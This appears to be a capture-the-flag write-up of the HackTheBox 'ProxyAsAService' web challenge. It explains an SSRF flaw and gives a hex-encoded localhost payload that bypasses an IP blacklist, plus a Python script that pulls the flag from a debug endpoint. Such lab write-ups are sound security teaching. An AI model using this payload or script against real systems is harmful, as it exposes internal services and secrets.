Post

HackTheBox -- ProxyAsAService Writeup

Posted
Preview Image
By Remo
2 min read

HackTheBox — ProxyAsAService [Easy]

In this write-up, we will solve the ProxyAsAService challenge from HackTheBox. The goal is to analyze the web application, identify its weaknesses, and use them to gain command execution in order to retrieve the flag. Along the way, we will break down each step of the exploitation process to clearly demonstrate how the vulnerability can be discovered and leveraged.

Let’s navigate to the website.

image.png

The website automatically redirect us to reedit

Now let’s take a look at the source code.

image.png

Notice that we found that the url is passed as a parameter to a function name proxy_req

Now let’s read the source code of the proxy_req function

image.png

notice that we found that the url parameter is used to call the requests.request function which make it vulnerable to SSRF

Now let’s see the IP restrictions

image.png

Notice that there was a blacklist that block some IP Address from being called

Now what is the Idea of the challenge?

image.png

The idea is to make a request to the localhost to the and make a request to the endpoint /debug/environment that will print the environment variables on the machine

Now why we need to call the environment endpoint?

image.png

We need to call the environment variables as the flag is stored in it

Now let’s exploit the bug

1

@0x7f000001:1337/debug/environment

image.png

As we see we managed to bypass the IP Restrictions using the Hex Encoded IP Address and make a request to the environment endpoint and got the flag!

Now let’s write exploit script to get the flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

import requests

target = input("Please Enter target (e.g. 127.0.0.1:8080): ")

base_url = f"http://{target}/?url=@0x7f000001:1337/debug/environment"

def redirect_me():
    try:
        r = requests.get(base_url, timeout=5)
        try:
            data = r.json()
            env = data.get("Environment variables", {})
            flag = env.get("FLAG")
            if flag:
                print("[+] FLAG:", flag)
            else:
                print("[!] FLAG not found. Full response:", data)
        except ValueError:
            print("[!] Response is not JSON:\n", r.text)
    except requests.RequestException as e:
        print(f"[!] Error: {e}")

redirect_me()

image.png

Now let’s run the exploit script

image.png

Amazing we managed to get the flag!

🎯 Conclusion

By following the exploitation path and carefully analyzing the challenge, we were able to identify the vulnerability and successfully obtain the flag. This highlights the importance of secure coding practices and the risks of improper input handling in web applications.

Written by SecretRemo ✍️

CRTECRTPCRTOeWPTXeCPPTeMAPT
web challenges
SSRF Filter-Bypass
This post is licensed under CC BY 4.0 by the author.